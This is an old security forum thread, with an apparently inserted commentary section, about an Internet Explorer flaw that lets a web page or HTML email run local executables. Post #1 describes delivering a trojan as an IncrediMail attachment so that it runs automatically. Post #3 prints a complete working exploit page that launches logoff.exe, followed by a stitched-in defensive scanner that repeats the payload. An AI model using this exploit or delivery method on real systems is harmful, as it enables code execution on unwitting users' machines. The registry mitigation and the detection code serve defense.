-
March 16th, 2002, 06:27 AM
#1
New MSIE Vulnerability - Remote Access
A Microsoft Internet Explorer vulnerability was found by GreyMagic
(http://security.greymagic.com/adv/gm001-ie/). With IncrediMail, it is
possible to gain remote access to a computer.
IncrediMail automatically saves email attachments in this directory
(on Windows 2000 Professional):
C:\Program Files\IncrediMail\Data\Identities\{42D00B20-479C-11d4-9706-00105A40931C}\Message Store\Attachments
So if you send an HTML email using the GreyMagic vulnerability with a
trojan as an attachment, it will be saved in this directory.
The HTML mail contains this code:
So, the trojan is executed automatically.
-
March 16th, 2002, 06:43 AM
#2
Demonstration: simple, advanced
Solution: There is no configuration-tweaking workaround for this bug, it will work as long as the browser parses HTML. The only possible solution must come in the form of a patch from Microsoft.
Update - 3 Mar 2002
Since the injected <object> runs in the "My Computer" Zone, changing the Internet Zone's settings didn't affect it, but changing the correct zone's settings will prevent this exploit from running.
Here is the registry information:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
Change the value of "1004" (DWORD) to 0x3.
Tested on: IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.
IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.
IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.
IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.
Taken from here.
-
March 20th, 2002, 06:39 PM
#3
A meaner piece of code than the example above. Once you visit the homepage, your computer will log off the current user. Norton AV did find and identify the above, but did not succeed in detecting and stopping this piece of code.
Source and example of the code can be found here --> http://www.****.org/~max/xp_rules.jpg (beware: visiting this webpage can log you out of the computer).
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
// Candidate locations of logoff.exe; whichever one exists on the
// victim's NT/2000/XP install is the one that gets run.
var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);
function Init(){
// The document inside a createPopup() window is rendered in the
// My Computer zone, so the Internet zone settings do not apply to it.
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
// The CLSID is bogus, so IE falls back to fetching the control from
// CODEBASE; with a local path there, the file is executed instead.
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</HEAD>
<BODY onload="Init()">
You should feel lucky if you don't have XP right now.
</BODY>
</HTML>
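An added example, not code from the original thread or from GreyMagic: a small static scanner for the pattern the posts above describe, written the way a mail-gateway or AV signature author might approach it. It reports three indicators: a literal <OBJECT> whose CODEBASE is a local path, a window.createPopup() call, and local .exe paths sitting in script string literals. The third one matters because in the logoff.exe page above the tag is assembled at runtime, so a signature that only waits for the finished tag (or for one specific file path) never sees it, which fits post #3's report that the AV caught the first variant but not this one. All sample inputs are constructed: the logoff one is trimmed from the page above, the attachment-store one is a hypothetical literal tag pointing into the IncrediMail directory named in the first post (the attachment name invoice.exe is made up), and the other two are benign controls.

```javascript
// Added example, not code from the original thread or from GreyMagic.
// Static scanner for the gm001-ie pattern: an <OBJECT> whose CODEBASE names
// a local file, injected into a window.createPopup() document so that it
// runs in the My Computer zone. Three indicators are reported so that a tag
// assembled at runtime by script is still caught even though the finished
// tag never appears in the markup.

// Indicator 1: a literal <object ...> whose codebase= is a local path.
const OBJECT_TAG = /<object\b[^>]*>/gi;
const CODEBASE_ATTR = /codebase\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
const LOCAL_PATH = /^(?:[a-z]:[\\/]|file:|\\\\)/i;

// Indicator 2: the popup-document trick itself.
const CREATE_POPUP = /\bcreatePopup\s*\(/i;

// Indicator 3: local .exe paths inside string literals in script, the form
// the runtime-assembled variant uses (the programName array above).
const EXE_LITERAL = /['"]([a-z]:[\\/][^'"]*?\.exe)['"]/gi;

// Return whichever capture group matched: double-quoted, single-quoted or bare.
function attrValue(m) {
  return m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3];
}

function scanHtml(html) {
  const literalLocalObjects = [];
  for (const tag of html.match(OBJECT_TAG) || []) {
    const m = CODEBASE_ATTR.exec(tag);
    if (m && LOCAL_PATH.test(attrValue(m))) literalLocalObjects.push(attrValue(m));
  }
  const exeLiterals = Array.from(html.matchAll(EXE_LITERAL), m => m[1]);
  const usesCreatePopup = CREATE_POPUP.test(html);

  // A literal local-codebase object is damning on its own. createPopup()
  // has legitimate uses (menus), so it only counts together with local
  // .exe strings sitting in the script.
  const suspicious = literalLocalObjects.length > 0
    || (usesCreatePopup && exeLiterals.length > 0);

  return { literalLocalObjects, exeLiterals, usesCreatePopup, suspicious };
}

// Constructed samples. "logoff" is trimmed from the page above; the others
// are hypothetical and exist only to exercise the scanner.
const SAMPLES = {
  logoff: `<SCRIPT language=JScript>
var programName=new Array('c:/windows/system32/logoff.exe','c:/winxp/system32/logoff.exe','c:/winnt/system32/logoff.exe');
function Init(){ var oPopup=window.createPopup(); var html='';
for(var n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopup.document.body.innerHTML=html; oPopup.show(290,390,200,200,document.body); }
</SCRIPT><BODY onload="Init()"></BODY>`,
  // Literal tag pointing into the IncrediMail attachment store from the
  // first post (invoice.exe is a made-up attachment name).
  attachmentStore: '<object classid="clsid:00000000-0000-0000-0000-000000000000"\n'
    + 'codebase="C:\\Program Files\\IncrediMail\\Data\\Identities\\'
    + '{42D00B20-479C-11d4-9706-00105A40931C}\\Message Store\\Attachments\\invoice.exe"></object>',
  // Ordinary Flash embed: remote codebase, no popup, nothing local.
  flash: '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"\n'
    + 'codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"></object>',
  // createPopup() used for a plain menu: must not be flagged.
  popupMenu: `<script>var p=window.createPopup();p.document.body.innerHTML='<b>menu</b>';p.show(10,10,100,50,document.body);</script>`,
};

function scanAll() {
  const out = {};
  for (const [name, html] of Object.entries(SAMPLES)) out[name] = scanHtml(html);
  return out;
}

for (const [name, r] of Object.entries(scanAll())) {
  console.log(name, r.suspicious ? "SUSPICIOUS" : "clean", r);
}
```

This is a static check over markup only: a page that splits the path into pieces or builds the string from character codes would still slip past it, which is why the zone setting quoted in post #2 or a vendor patch is the real fix and a scanner like this only buys triage.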
-
March 20th, 2002, 06:55 PM
#4
I ran the GreyMagic test on the following:
IE6.0, Win98, all patches, Scriptblocking enabled
IE5.5, sp/2, Win98se, Scriptblocking enabled
IE5.5, sp/1, Win98, Scriptblocking enabled
The code attempted to run in each case but NAV 7.0 (2001) stopped the exploit each time.
BTW, Norton Personal Firewall did *nothing*.
-
March 20th, 2002, 07:00 PM
#5
Kinda goes to show, you really shouldn't integrate a browser with the Operating System so closely. Modularity is security, in this case--visiting a page with any of the above code will not harm Netscape, for instance, because it is not integrated with the operating system.
Of course, none of the above exploits had any effect on Opera 5, for RedHat 7.1 ;-)
Got Root?
This user powered by Linux.
-
March 20th, 2002, 09:39 PM
#6
KublaiKhan wrote:
"Of course, none of the above exploits had any effect on Opera 5, for RedHat 7.1 ;-)"
Neither of the above exploits had any effect on OffByOne ver.3.2G, Win98. :-)